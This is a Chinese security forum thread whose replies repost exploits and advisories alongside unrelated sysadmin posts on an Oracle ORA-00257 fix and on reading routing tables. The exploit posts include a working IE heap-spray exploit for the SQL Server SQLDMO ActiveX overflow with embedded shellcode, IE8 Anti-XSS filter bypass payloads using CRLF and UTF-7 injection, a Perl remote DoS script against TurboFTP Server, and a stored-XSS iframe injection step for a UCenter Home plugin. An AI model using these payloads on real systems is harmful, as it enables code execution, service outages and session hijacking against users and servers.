最近看过此主题的会员

返回列表 发帖

我的第一次居然就死在zheli

~~~~~发帖  难得发个帖子
非安全中国网免责声明 1、本帖所有言论和图片纯属发表者个人意见,与本站立场无关;
2、本话题由:期木发表,本帖发表者期木符合《关于版权及免责声明》6大管理制度规定,享有相关权利;
3、其他单位或个人使用、转载或引用本帖时必须征得发表者期木和本站的同意;
4、本帖作品部分转载自其它媒体并在本站发布,转载的目的在于传递更多信息,并不代表本站赞同其观点和对其真实性负责;
5、本帖如有侵犯到贵站或个人版权问题,请立即告知本站,本站将及时予与删除,并致以最深的歉意;
6、本站管理员和版主有权不事先通知发帖者而删除本文。

果然是标题党啊!

TOP

Microsoft SQL Server Distributed Management溢出
<!--+ title: Microsoft SQL Server Distributed Management Objects Buffer Overflow+ Critical: Critical (remote)+ Impact: MS Internet Explorer 6 -> Code Execute+ Tested Operating System: Windows XP SP2 KR, Windows 2000 Pro SP4 KR+ Tested Software: MSDE 2000 SQLDMO.dll (version 2000.80.760.0)+ Reference & Thanks :      code by rgod http://www.milw0rm.com/exploits/4379     code by Trirat Puttaraksa http://www.milw0rm.com/exploits/2426+ Author: 96sysim (sysim@nate.com)--><html><object classid='clsid:10020200-E260-11CF-AE68-00AA004A34D5' id='SQLServer' /></object><SCRIPT language="javascript">// Heap Spray // execute "calc.exe"shellcode =unescape("%uE8FC%u0044%u0000%u458B%u8B3C%u057C%u0178%u8BEF%u184F%u5F8B%u0120%u49EB%u348B%u018B%u31EE%u99C0%u84AC%u74C0%uC107%u0DCA%uC201%uF4EB%u543B%u0424%uE575%u5F8B%u0124%u66EB%u0C8B%u8B4B%u1C5F%uEB01%u1C8B%u018B%u89EB%u245C%uC304%uC031%u8B64%u3040%uC085%u0C78%u408B%u8B0C%u1C70%u8BAD%u0868%u09EB%u808B%u00B0%u0000%u688B%u5F3C%uF631%u5660%uF889%uC083%u507B%u7E68%uE2D8%u6873%uFE98%u0E8A%uFF57%u63E7%u6C61%u0063");bigblock = unescape("%u9090%u9090");headersize = 20;slackspace = headersize+shellcode.length;while (bigblock.length<slackspace) bigblock+=bigblock;fillblock = bigblock.substring(0, slackspace);block = bigblock.substring(0, bigblock.length-slackspace);while(block.length+slackspace<0x40000) block = block+block+fillblock;memory = new Array();for (i=0;i<501;i++) memory = block + shellcode;</SCRIPT><script language='vbscript'>targetFile = "C:ProgrammiMicrosoft SQL Server80ToolsBinnsqldmo.dll"prototype  = "Sub Start ( ByVal StartMode As Boolean ,  [ ByVal Server As Variant ] ,  [ ByVal Login As Variant ] ,  [ ByVal Password As Variant ] )"memberName = "Start"progid     = "SQLDMO.SQLServer"argCount   = 4myseh        = unescape("%u0D0D%u0D0D")   // heap spray range - possible changeStartMode =TrueServer    ="http://ZZZZYYYYXXXXWW?WVVVVAAAAAAAAAAAAAAAAAA@AA        es        est        est        es.        testMMMMLLLLKKKJJJJIIIIHH.HGGGGGFFFFEEEEDDDDDDDBBBBAAAA\\\\:#$%AAAABBBBCCCCDD?DEEEEFFFFGGG\:#$%HHHHHIIII        e@st        es        est        est        es.aaaabbbbccccddddeeeeffffgggghhhhiiiiaaaaaaaaa" + myseh + "Dmmm" + edx + "nnnBBBBAAAAZZ\\\\:#$%YYYYXXXXWWWWVV?VUUUUTTTTSSS\:#$%RRRRRQQQQPP@PPOOONNNNMMMMLLL.KKKKKJJJJIIIIHHHGGGGFFFFEE.EDDDDDDDDDBBBBAAAAAAAAAAAAAAA\\\\:#$%AAAAAAAAAAAAAA?Awwwwvvvvuuu\:#$%        ttttssss
r@rrqqqppppoooo
nn.mmmmmllllkkkkjjjiiiihhhhgg.gfffffeeeeddddcccbbbaaaaAAAA\\\"Login     ="aaaaaaaa"Password  ="bbbbbbbb"SQLServer.Start StartMode ,Server ,Login ,Password</script></html>


















公告:https://www.sitedirsec.com公布最新漏洞,请关注

TOP

IE8.0 Beta 2 Anti-XSS问题
Aspect9: Internet Explorer 8.0 Beta 2 Anti-XSS Filter Vulnerabilities
Release Date:December 11, 2008
Date Reported:October 5, 2008
Severity:Medium-High (Execute scripts, Turning Protection Off, Transfer data CrossDomains)
Vendor:Microsoft
Systems Affected:Windows Platform with Internet Explorer 8.0 Beta 2
Overview:Aspect9 has discovered several vulnerabilities in Microsoft WindowsInternet Explorer 8.0 Beta 2. This new version of Microsoft's famousbrowser includes new security improvements such as a Cross Site Scripting(XSS) filter. This version also includes a new object that safely allowstransferring  data across domains, allowing them to interact with each other.
The Anti-XSS filter has been found to have some security holes in thecurrent implementation. Microsoft decided to filter "Type 1 XSS" which isfree  text send to the server being reflected to the user and thereforeinjecting HTML code into the website's page. They chose not to handlecertain situations such as injection into a JavaScript tag space, whichwould be extremely difficult to filter. The software giant also chose notto filter injection into HTTP headers, which will drive hackers to focus ondiscovering CRLF vulnerabilities.
A quote of Microsoft's Anti-XSS filter design philosophy:<<<"Like all security mitigation and protection technologies, the XSS Filter'sapproach does have limitations, being that it is a pragmatic balancebetween application compatibility, security, and performance.
Some examples:* Injection into some contexts is not blocked. Ex: Scenarios where contentcan be injected directly into JavaScript without breaking out of a string.
* Injections facilitated by some HTTP headers are not currently blocked.Ex: "Referer" based injection.
* If a page contains multiple nearby injection points, attacks can beconstructed that thwart the XSS Filter.">>>
For more information about the Anti-XSS filter:http://blogs.msdn.com/dross/archive/2008/07/03/ie8-xss-filter-design-philosophy-in-depth.aspx
In order to understand the contents of this advisory, the reader must befamiliar with the concept of CRLF which is distinguished from CRSF.http://www.owasp.org/index.php/CRLF_Injectionhttp://www.owasp.org/index.php/CSRF
Technical Details:
Bypass using CRLF+Encodings:---------------------------------------------Microsoft Windows Internet Explorer 8.0 Beta 2 was designed to stop "Type 1XSS" attacks. CRLF Injection is also XSS type 1 and is not mitigated by thefilter, though the data in the query string will still be filtered.This means that if an attacker tries to exploit a CRLF for XSS in thecasual manner, used in this demo:http://www.sitedir.com.cn/crlf.py?url=cookie1%3dvalue1;%0D%0A%0D%0A<html><body><script>alert('get it?')</script></body></html>
His attack will fail as "<script>" will be filtered to "<sc#ipt>"
However, an attacker can inject a content-type header and overwrite thepage charset and therefore bypass the XSS filter which uses the priorencoding. A good example for this is with utf-7, the following request:http://www.sitedir.com.cn/crlf.py?url=cookie1%3dvalue1;%0d%0aContent-Type: text/html; charset%3dutf-7%0d%0a%0d%0a<html><body>+ADw-script+AD4-alert('owned')+ADw-/script+AD4-</body></html>
This will result in:
HTTP/1.1 200 OKContent-Type: text/html; charset=utf-7Server: Microsoft-IIS/6.0Set-Cookie: url=cooki1=value1;X-Powered-By: PleskWinMicrosoftOfficeWebServer: 5.0_PubX-Powered-By: ASP.NETDate: Sun, 05 Oct 2008 23:46:11 GMTConnection: close
<html><body>+ADw-script+AD4-alert('owned')+ADw-/script+AD4-</body></html>;Content-Type: text/html
This will be rendered as utf-7 and will execute.
Bypass using CRLF+"X-XSS-Protection":-------------------------------------------------------In addition to the problem of CRLF being able to re-write the page andbypass the filter using a different encoding than the one of the page,Microsoft were kind enough to leave a backdoor AKA feature for developersto turn the filter off. This header is called "X-XSS-Protection" which getsa Boolean value of 0 or 1. Injecting "X-XSS-Protection: 0" though CRLF anattacker can shutdown the XSS protection for the current request.
Demo:http://www.sitedir.com.cn/crlf.py?url=cooki1%3dvalue1;%0d%0aX-XSS-Protection:0%0d%0a%0d%0a<html><body><script>alert('owned')</script></body></html>
Of course the problem goes further to any HTTP header that can be usedmaliciously like setting cookies and by that changing to a different userthen the one logged on, such as stealing their cookie and then replacing itwith a cookie of a bulk user and therefore taking over their session. using"Location:" header to redirect pages and internal frames/iframes tolook-a-like phishing websites and etc...
Demos:http://www.sitedir.com.cn/crlf.py?url=cooki1%3dvalue1;%0d%0aLocation:http://www.micros0ft.com%0d%0a%0d%0a
http://www.sitedir.com.cn/crlf.py?url=cooki1%3dvalue1;%0d%0aSet-Cookie:sessionid%3dblablablabla_bulk_user_md5_sessionid%0d%0a%0d%0a<html><body>The server is busy, try again in 30 minutes</body></html>
CRLF+"XDomainRequestAllowed" --> XDomainRequest Enabling:---------------------------------------------------------Having a CRLF injection already gives an attacker the ability to overwritethe HTTP response BODY, which means he can create a new hiddenimage/frame/form and send data through it, data such as the domains cookie.But it is clear that overwriting the body using CRLF and making it look thesame requires a "fetcher" server side script on the same domain. Also anetwork  filter or a WAF may deny injection of double CRLF (%0d%0a%0d%0a).As time goes by and security evolves, the attacker should have a hardertime sending this information out silently.
In IE8, there is a new object called "XDomainRequest" which is designed toallow safe data exchange across domains.More information at:http://msdn.microsoft.com/en-us/library/cc288108(VS.85).aspx
The browser will only allow the client(the JavaScript code) to interactwith that website if the website returns the "XDomainRequestAllowed"Boolean header.
Using CRLF to inject XDomainRequestAllowed header an attacker can interactin a CROSS DOMAIN mode with that website without his consent, as it isbeing faked by the injected header. This attack concept on the XDomainRequestin general should be named "XAI" (XDR Allowed Injection)
This is a demo request to a CRLF vulnerable web page:http://www.sitedir.com.cn/crlf.py?url=cooki1%3dvalue1;%0d%0aXDomainRequestAllowed: 1
This is how the attacker's script would look like:------------------------------------------------ <script> try {      xdr = new XDomainRequest();      xdr.onload = function() {        alert(xdr.responseText);      }      xdr.open("GET", "http://www.sitedir.com.cn/crlf.py?url=cooki1%      3dvalue1;%0d%0      aXDomainRequestAllowed: 1");      xdr.send(""); } catch (e) {    alert(e.description) } </script>------------------------------------------------The attacker can now transfer data to/from that domain other domains with just 1header injection, a new, by design weapon to replace leak data with XSS.An attacker can use the new feature to interact with web servers (i.e. send andreceive data from those domains) by pretending to have theauthorization to do so,using a single CRLF header injection.This is an ultimate vulnerability that exploits this new feature to enable easyinformation data leakage and cross domain attacks.
UTF-7 Websites are not filtered:-------------------------------------------When the page charset is set to utf-7 whether by the http header or by ameta tag, the Anti-XSS filter will not apply on this page, allowing a utf-7encoded injected html code to execute. In other words, utf-7 content sentto utf-7 encoded web pages is not filtered, therefore allowing XSS attackson utf-7 web pages.
I must admit that I have never met a website written in utf-7 for non-maliciouspurposes, but it is still a feature and there are many website thatimplement language templates and receive the charset as a parameter fromthe query string or the cookie.
Demos:http://www.sitedir.com.cn/xssurlnoparams.py/+AD4-+ADw-script+AD4-alert('see?')+ADw-/script+AD4-+ADw-div
http://www.sitedir.com.cn/xssurlnoparams.py?data=+AD4-+ADw-script+AD4-alert('see?')+ADw-/script+AD4-+ADw-div
Direct bypass using any double injection:-----------------------------------------A quote from the filter's architecture implementation:<<<"If a page contains multiple nearby injection points, attacks can beconstructed that thwart the XSS Filter.">>>Well, that is not accurate.
ANY second appearance of the injected data will allow execution of scriptcode. The concept is that data inside tags such as script and style isparsed by their own parser.
The CSS(style) parser has 2 characteristics that differentiate it from thescript parser:1) It is a silent parser (there is no indication of failure)2) It is executing as batch operations per block, which means that closingA NON EXISTING (never opened) block will cause parsing of the followingblocks. What does this mean?!?!
It means that in a quite common scenario of any text injected just twice atany position inside the HTML(except inside a textarea/script/style tags,these can also be fixed by putting </textarea> in a css comment) of thepage will cause at the first point where the code is injected to the page
} BODY{a:expression(alert('hi'))};</style>***<style>***
a style tag is opened and anything after it will be ignored by a silent cssparser error and on the second injection:
***} BODY{a:expression(alert('hi'))};</style>***<style>
a new style block will be opened, rendered and this would automaticallyexecute script code!
Demo:http://www.sitedir.com.cn/doublexss.py?username=} BODY{a:expression(alert('hi'))};</style><style>
Filter False Positives:-----------------------The following text send to a page as parameters will trigger a false-positivematch by the Anti-XSS filter:
<"script">alert('innocent code')</script><'script'>alert('innocent code')</script>"<[whatever]script>alert('innocent code')</script>
The following should trigger on most CSS design forums with a previewfeature:<style>@import</style><style>x:y(1)</style>
This means that a CSS tutorial web page cannot send to itself or to anotherpage the following raw text (whether it will be treated as text or as HTMLby the receiving page):
<style>color:rgb(1,2,3)</style>
Vendor Status:Microsoft's response regarding the CRLF issues:"We will not be lead to compromise the XSS Filter's web site compatibilityby attempting to  address every conceivable XSS attack scenario."
Microsoft's response regarding the STYLE issue:"We hope we can get a change in prior to IE8 RC1"
Microsoft's response regarding the "filter not applied in UTF-7 Websites":"Behaviour is by design"
Credit:Rafel Ivgi
Greetings:David Ross, the_pull, Arkon, JonD, lorgandon, xbxice, Budo, Reiter,Inga, Lucid, h.p.c, Dror Shalev,  Liu Die Yu, wir3less, Zull, 0fir0,dbrod, ax1les,whitehawkofjustice
DisclaimerThe information within this paper may change without notice.Use of this information constitutes acceptance for use in anAS IS condition. There are no warranties, implied or express,with regard to this information. In no event shall the authorbe liable for any direct or indirect damages whatsoeverarising out of or in connection with the use or spread ofthis information. Any use of this information is at theuser's own risk.


















公告:https://www.sitedirsec.com公布最新漏洞,请关注

TOP

偶学习的对像:妖精‖→小瑶、爱海滔滔、峥婉儿、话裳、希望、涛涛俊、为你伤心为你哭


















公告:https://www.sitedirsec.com公布最新漏洞,请关注

TOP

Oracle数据库的ORA-00257故障解决过程
概述:
  Oracle数据库是目前业界最常用的大型数据库系统,我在实际项目中遇到出现ORA-00257错误(空间不足错误),通过查找资料,绝大部分说这是由于归档日志太多,占用了全部的硬盘剩余空间导致的,通过简单删除日志或加大存储空间就能够解决。但是我在Oracle 10g上发现,存储空间还有很大,却也报这个错误。原来是Oracle 10g中新的特性,对Flash Recovery的管理导致的。
  1、软硬件环境
  服务器HP Proliant DL580G4(Intel Xeon 3.16GHz/4GB/ 72.8*4/RAID4)
  操作系统Red Flag DC Server release 5.0 (Trinity) for x86-64 Linux
  数据库Oracle 10.2.0.1.0
  2、问题现象
  数据库系统已经试运行了半个多月,在7月24日晚上连接数据库后做数据更新时出现ORA-00257错误,如下图。
            连接数据库后做数据更新时出现ORA-00257错误
  提示归档错误,通过查找ORACLE错误代码,解释为硬盘空间不足,需要删除归档日志增加空间,但是服务器可用空间200GB,目前只用了10GB左右,这是为什么呢?
  3、诊断过程:
  1)查看ORACLE数据库归档日志情况
[root@hrmsdb /]# cd /oracle/flash_recovery_area/HKCHR/archivelog
[root@hrmsdb archivelog]# ls
2006_07_04 2006_07_13 2006_07_17 2006_07_20 2006_07_23
2006_07_11 2006_07_14 2006_07_18 2006_07_21 2006_07_24
2006_07_12 2006_07_15 2006_07_19 2006_07_22 2006_07_25
[root@hrmsdb archivelog]# cd 2006_07_25
[root@hrmsdb 2006_07_25]# ls
[root@hrmsdb 2006_07_25]# cd ../2006_07_24
[root@hrmsdb 2006_07_24]# ls
o1_mf_1_92_2d933vgb_.arc o1_mf_1_96_2d954ns7_.arc o1_mf_1_98_2d969d5h_.arc
o1_mf_1_95_2d9537cs_.arc o1_mf_1_97_2d956km0_.arc
  说明在出现问题之前数据库归档处理一直是正常的。
  2)查看数据库REDOLOG情况
[oracle@hrmsdb ~]$ sqlplus /nolog
SQL*Plus: Release 10.2.0.1.0 - Production on 星期二 7月 25 10:44:18 2006
Copyright (c) 1982, 2005, Oracle. All rights reserved.
SQL> connect / as sysdba
已连接。
SQL> select * from v$log;
GROUP# THREAD# SEQUENCE# BYTES MEMBERS ARC STATUS FIRST_CHANGE# FIRST_TIME
---------- ---------- ---------- ---------- ---------- --- --------------------------------------- --------------
1 1 101 52428800 1 NO CURRENT 3621973 24-7月 -06
2 1 99 52428800 1 NO INACTIVE 3600145 24-7月 -06
3 1 100 52428800 1 NO INACTIVE 3611932 24-7月 -06
  发现ARC状态为NO,表示系统没法自动做归档。
  3)手工切换日志
SQL> alter system switch logfile;
alter system switch logfile
*第 1 行出现错误:
  ORA-01013: 用户请求取消当前的操作
  在等待长时间没反应后,中断操作,手工切换日志没有成功。
  4)查看Oracle数据库后台归档服务进程
[oracle@hrmsdb ~]$ ps -ef|grep oracle
oracle 4601 1 0 Jul11 ? 00:00:04 /oracle/product/10.2.0/db_1/bin/
tnslsnr LISTENER -inherit
oracle 5025 1 0 Jul11 ? 00:00:00 /usr/bin/ssh-agent -s
oracle 20923 1 0 Jul24 ? 00:00:01 ora_pmon_hkchr
oracle 20925 1 0 Jul24 ? 00:00:00 ora_psp0_hkchr
oracle 20927 1 0 Jul24 ? 00:00:00 ora_mman_hkchr
oracle 20929 1 0 Jul24 ? 00:00:01 ora_dbw0_hkchr
oracle 20931 1 0 Jul24 ? 00:01:07 ora_lgwr_hkchr
oracle 20933 1 0 Jul24 ? 00:00:05 ora_ckpt_hkchr
oracle 20935 1 0 Jul24 ? 00:00:01 ora_smon_hkchr
oracle 20937 1 0 Jul24 ? 00:00:00 ora_reco_hkchr
oracle 20939 1 0 Jul24 ? 00:00:00 ora_cjq0_hkchr
oracle 20941 1 0 Jul24 ? 00:00:01 ora_mmon_hkchr
oracle 20943 1 0 Jul24 ? 00:00:05 ora_mmnl_hkchr
oracle 20945 1 0 Jul24 ? 00:00:00 ora_d000_hkchr
oracle 20947 1 0 Jul24 ? 00:00:00 ora_s000_hkchr
oracle 20953 1 0 Jul24 ? 00:09:41 ora_arc0_hkchr
oracle 20955 1 1 Jul24 ? 00:10:29 ora_arc1_hkchr
oracle 20959 1 0 Jul24 ? 00:00:00 ora_qmnc_hkchr
oracle 20967 1 0 Jul24 ? 00:00:00 ora_q000_hkchr
oracle 20969 1 0 Jul24 ? 00:00:00 ora_q001_hkchr
oracle 21715 1 0 Jul24 ? 00:00:19 oraclehkchr (LOCAL=NO)
oracle 21765 1 0 Jul24 ? 00:00:00 ora_j000_hkchr
oracle 21816 1 0 Jul24 ? 00:00:00 ora_j001_hkchr
oracle 21832 1 0 Jul24 ? 00:00:00 ora_j002_hkchr
oracle 21839 1 0 Jul24 ? 00:00:00 ora_j003_hkchr
oracle 21859 1 0 Jul24 ? 00:00:00 ora_j004_hkchr
oracle 21861 1 0 Jul24 ? 00:00:00 ora_j005_hkchr
oracle 21886 1 0 Jul24 ? 00:00:00 ora_j006_hkchr
oracle 21888 1 0 Jul24 ? 00:00:00 ora_j007_hkchr
root 23187 23186 0 10:39 ? 00:00:00 login -- oracle
oracle 23188 23187 0 10:39 pts/0 00:00:00 -bash
oracle 23216 23188 0 10:39 pts/0 00:00:00 sqlplus
oracle 23217 23216 0 10:39 ? 00:00:00 oraclehkchr (DESCRIPTION=(LOCAL=
YES)(ADDRESS=(PROTOCOL=beq)))
root 23224 23223 0 10:40 ? 00:00:00 login -- oracle
oracle 23225 23224 0 10:40 pts/1 00:00:00 -bash
oracle 23310 23225 0 10:46 pts/1 00:00:00 ps -ef
oracle 23311 23225 0 10:46 pts/1 00:00:00 grep oracle
[oracle@hrmsdb ~]$
后台进程都正常运行。
  5)查看FLASH_RECOVERY_AREA空间使用情况
[root@hrmsdb /]# cd /oracle
[root@hrmsdb oracle]# ls
admin flash_recovery_area oraInventory product
[root@hrmsdb oracle]# du -a -k flash_recovery_area
4 flash_recovery_area/HKCHR/onlinelog
42456 flash_recovery_area/HKCHR/archivelog/2006_07_15/o1_mf_1_74_2cj1h1jz_.arc
……………….
42448 flash_recovery_area/HKCHR/archivelog/2006_07_14/o1_mf_1_68_2cfzwwvt_.arc
512560 flash_recovery_area/HKCHR/archivelog/2006_07_14
1469224 flash_recovery_area/HKCHR/archivelog
6988 flash_recovery_area/HKCHR/backupset/2006_07_04/o1_mf_ncsnf_TAG20060704T1
74229_2bng1o0b_.bkp
876916 flash_recovery_area/HKCHR/backupset/2006_07_04/o1_mf_nnndf_TAG20060704T1
74229_2bng0cx4_.bkp
883908 flash_recovery_area/HKCHR/backupset/2006_07_04
883912 flash_recovery_area/HKCHR/backupset
2353144 flash_recovery_area/HKCHR
2353148 flash_recovery_area
[root@hrmsdb oracle]#
FLASH_RECOVERY_AREA空间使用了2.35GB
  6)查看FLASH_RECOVERY_AREA空间中各部分使用情况
SQL> select * from v$recovery_file_dest;
NAME SPACE_LIMIT SPACE_USED SPACE_RECLAIMABLE NUMBER_OF_FILES
------------------------------------------------------------------------------------------------------------------
/oracle/flash_recovery_area 2147483648 2134212608 0 35
SQL> select * from v$flash_recovery_area_usage;
FILE_TYPE PERCENT_SPACE_USED PERCENT_SPACE_RECLAIMABLE NUMBER_OF_FILES
------------ ------------------ ------------------------- ---------------- -------------- -------------- -------------
CONTROLFILE 0 0 0
ONLINELOG 0 0 0
ARCHIVELOG 69.97 0 40
BACKUPPIECE 30.01 0 2
IMAGECOPY 0 0 0
FLASHBACKLOG 0 0 0
已选择6行。
  发现ARCHIVELOG占近70%,BACKUPPIRCR占了30%,这样FLASH_RECOVERY_AREA空间的空间已经被完全占据了。
  4、解决过程
  根据数据库目前可用存储空间为200GB、FLASH_RECOVERY_AREA空间为2GB的实际情况,把FLASH_RECOVERY_AREA的空间修改为20GB。
SQL> alter system set DB_RECOVERY_FILE_DEST_SIZE=20g;
系统已更改。
SQL> select * from v$recovery_file_dest;
------------------------------------------------------- ---------- -----------------------------------
NAME SPACE_LIMIT SPACE_USED SPACE_RECLAIMABLE NUMBER_OF_FILES
----------- ---------- ----------------- ------------- -------------- ---------- ---------- ------------
/oracle/flash_recovery_area 2.1475E+10 2264587776 0 38
  这时再查看日志的状态,发现REDO LOG处于正常的归档状态。
SQL> select * from v$log;
GROUP# THREAD# SEQUENCE# BYTES MEMBERS ARC STATUS FIRST_CHANGE# FIRST_TIME
---------- ---------- ---------- ---------- ---------- --- -------------------------------------------- --------------
1 1 101 52428800 1 YES ACTIVE 3621973 24-7月 -06
2 1 102 52428800 1 NO CURRENT 3650399 25-7月 -06
3 1 100 52428800 1 YES INACTIVE 3611932 24-7月 -06
SQL> select * from v$flash_recovery_area_usage;
FILE_TYPE PERCENT_SPACE_USED PERCENT_SPACE_RECLAIMABLE NUMBER_OF_FILES
------------ ------------------ ------------------------- ---------------
CONTROLFILE 0 0 0
ONLINELOG 0 0 0
ARCHIVELOG 7.6 0 43
BACKUPPIECE 4.21 0 2
IMAGECOPY 0 0 0
FLASHBACKLOG 0 0 0
已选择6行。
SQL>
  5、小结
  造成本次故障的原因由两方面同时发生所造成的:
  ·其一是Flash_Recovery_Area空间缺省安装时比较小,只有2GB,容易用完;
  ·其二是由于采用归档方式通过Veritas备份,由于备份软件没有运行,造成归档日志没有及时删除。
  从本次故障解决处理中,我们可以得出经验教训:
  ·Oracle 10g数据库物理空间管理方式与以前Oracle发生了变化,对归档日志所在的Flash_Recovery_Area空间进行了另外限制;   ·对数据库系统管理员要对Oracle数据库归档日志、备份软件运行状况定期检查,提前发现、处理可能发生的故障。


















公告:https://www.sitedirsec.com公布最新漏洞,请关注

TOP

TurboFTP-Server-1.00.712-Remote-DoS
本站提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!# Exploit Title : TurboFTP Server 1.00.712 Remote DoS
# Date          : 30 december 2009
# Author        : corelanc0d3r (corelanc0d3r[at]gmail{dot}com)
# Bug found by  : corelanc0d3r (corelanc0d3r[at]gmail{dot}com)
# Software Link : http://www.tbsoftinc.com/download/tbftpsrv.exe
# Version       : 1.00.712
# Issue fixed in: 1.00.720
# OS            : Windows
# Tested on     : XP SP3 En (VirtualBox)
# Type of vuln  : DoS
# Greetz to     : Corelan Security Team::EdiStrosar/Ricks2600/MarkoT/mr_me/ekse
#
# Script provided 'as is', without any warranty.
# Use for educational purposes only.
#
#
# Code :
print "|------------------------------------------------------------------|
";
print "|                         __               __                       |
";
print "|   _________  ________  / /___ _____     / /____  ____ _____ ___  |
";
print "|  / ___/ __ \/ ___/ _ \/ / __ `/ __ \   / __/ _ \/ __ `/ __ `__ \ |
";
print "| / /__/ /_/ / /  /  __/ / /_/ / / / /  / /_/  __/ /_/ / / / / / / |
";
print "| \___/\____/_/   \___/_/\__,_/_/ /_/   \__/\___/\__,_/_/ /_/ /_/  |
";
print "|                                                                  |
";
print "|                                       http://www.corelan.be:8800 |
";
print "|                                                                  |
";
print "|-------------------------------------------------[ EIP Hunters ]--|

";
print "[+] DoS exploit for TurboFTP Server 1.00.712
";

use IO::Socket;

if ($#ARGV ne 3) {
print "
  usage: $0 <targetip> <targetport> <user> <password>
";
exit(0);
}

my $user=$ARGV[2];
my $pass=$ARGV[3];

print " [+] Preparing DoS payload
";
my $payload = "A" x 2000;
print " [+] Connecting to server $ARGV[0] on port $ARGV[1]
";
$sock = IO::Socket::INET->new(PeerAddr => $ARGV[0],
                              PeerPort => $ARGV[1],
                              Proto    => 'tcp');

$ftp = <$sock> || die " [!] *** Unable to connect ***
";
print "   ** $ftp";
$ftp = <$sock>;
print "   ** $ftp";
print " [+] Logging in (user $user)
";
print $sock "USER $user
";
$ftp = <$sock>;
print "   ** $ftp";
print $sock "PASS $pass
";
$ftp = <$sock>;
print "   ** $ftp";
print " [+] Sending payload
";
print $sock "DELE ".$payload."
";
$ftp = <$sock>;
print "   ** $ftp";
print " [+] Payload sent, now checking FTP server state
";
$sock2 = IO::Socket::INET->new(PeerAddr => $ARGV[0],
                              PeerPort => $ARGV[1],
                              Proto    => 'tcp');
my $ftp2 = <$sock2> || die " [+] DoS successful
";
print " [!] DoS did not seem to work
";
print "   ** $ftp2
";


















公告:https://www.sitedirsec.com公布最新漏洞,请关注

TOP

UCenter Home音乐插件XSS跨站漏洞
漏洞利用方法:添加音乐,在音乐标题处 输入"><iframe src=http://www.sitedir.com.cn width=500 height=500></iframe>
然后下边正常填写 最后发布就可以了 上传的音乐要管理员审核后才可以发表出来
当管理员审核的时候就中招了  此漏洞相当严重


















公告:https://www.sitedirsec.com公布最新漏洞,请关注

TOP

如何读懂路由表
如何读懂路由表
源码:--------------------------------------------------------------------------------Active Routes: Network Destination Netmask Gateway Interface Metric 0.0.0.0 0.0.0.0 192.168.123.254 192.168.123.88 1 0.0.0.0 0.0.0.0 192.168.123.254 192.168.123.68 1 127.0.0.0 255.0.0.0 127.0.0.1 127.0.0.1 1 192.168.123.0 255.255.255.0 192.168.123.68 192.168.123.68 1 192.168.123.0 255.255.255.0 192.168.123.88 192.168.123.88 1 192.168.123.68 255.255.255.255 127.0.0.1 127.0.0.1 1 192.168.123.88 255.255.255.255 127.0.0.1 127.0.0.1 1 192.168.123.255 255.255.255.255 192.168.123.68 192.168.123.68 1 192.168.123.255 255.255.255.255 192.168.123.88 192.168.123.88 1 224.0.0.0 224.0.0.0 192.168.123.68 192.168.123.68 1 224.0.0.0 224.0.0.0 192.168.123.88 192.168.123.88 1 255.255.255.255 255.255.255.255 192.168.123.68 192.168.123.68 1 Default Gateway: 192.168.123.254 --------------------------------------------------------------------------------====================================================================== 当前的路由: destination 目的网段 mask 子网掩码 interface 到达该目的地的本路由器的出口ip gateway 下一跳路由器入口的ip,路由器通过interface和gateway定义一调到下一个路由器的链路,通常情况下,interface和gateway是同一网段的 metric 跳数,该条路由记录的质量,一般情况下,如果有多条到达相同目的地的路由记录,路由器会采用metric值小的那条路由 第一条 缺省路由:意思就是说,当一个数据包的目的网段不在你的路由记录中,那么,你的路由器该把那个数据包发送到哪里!缺省路由的网关是由你的连接上的default gateway决定的 该路由记录的意思是:当我接收到一个数据包的目的网段不在我的路由记录中,我会将该数据包通过192.168.123.88这个接口发送到192.168.123.254这个地址,这个地址是下一个路由器的一个接口,这样这个数据包就可以交付给下一个路由器处理,与我无关。该路由记录的线路质量 1 第二条 缺省路由: 该路由记录的意思是:当我接收到一个数据包的目的网段不在我的路由记录中,我会将该数据包通过192.168.123.68这个接口发送到192.168.123.254这个地址,这个地址是下一个路由器的一个接口,这样这个数据包就可以交付给下一个路由器处理,与我无关。该路由记录的线路质量 1 第三条 本地环路:127.0.0.0这个网段内所有地址都指向自己机器,如果收到这样一个数据,应该发向哪里 该路由记录的线路质量 1 第四条 直联网段的路由记录:当路由器收到发往直联网段的数据包时该如何处理,这种情况,路由记录的interface和gateway是同一个。 当我接收到一个数据包的目的网段是192.168.123.0时,我会将该数据包通过192.168.123.68这个接口直接发送出去,因为这个端口直接连接着192.168.123.0这个网段,该路由记录的线路质量 1 第五条 直联网段的路由记录 当我接收到一个数据包的目的网段是192.168.123.0时,我会将该数据包通过192.168.123.88这个接口直接发送出去,因为这个端口直接连接着192.168.123.0这个网段,该路由记录的线路质量 1 第六条 本地主机路由:当路由器收到发送给自己的数据包时将如何处理 当我接收到一个数据包的目的网段是192.168.123.68时,我会将该数据包收下,因为这个数据包时发送给我自己的,该路由记录的线路质量 1 第七条 本地主机路由:当路由器收到发送给自己的数据包时将如何处理 当我接收到一个数据包的目的网段是192.168.123.88时,我会将该数据包收下,因为这个数据包时发送给我自己的,该路由记录的线路质量 1 第八条 本地广播路由:当路由器收到发送给直联网段的本地广播时如何处理 当我接收到广播数据包的目的网段是192.168.123.255时,我会将该数据从192.168.123.68接口以广播的形势发送出去,该路由记录的线路质量 1 第九条 本地广播路由:当路由器收到发送给直联网段的本地广播时如何处理 当我接收到广播数据包的目的网段是192.168.123.255时,我会将该数据从192.168.123.88接口以广播的形势发送出去,该路由记录的线路质量 1 第十条 组播路由:当路由器收到一个组播数据包时该如何处理 当我接收到组播数据包时,我会将该数据从192.168.123.68接口以组播的形势发送出去,该路由记录的线路质量 1 第十一条 组播路由:当路由器收到一个组播数据包时该如何处理 当我接收到组播数据包时,我会将该数据从192.168.123.88接口以组播的形势发送出去,该路由记录的线路质量 1 第十二条 广播路由:当路由器收到一个绝对广播时该如何处理 当我接收到绝对广播数据包时,将该数据包丢弃掉


















公告:https://www.sitedirsec.com公布最新漏洞,请关注

TOP

返回列表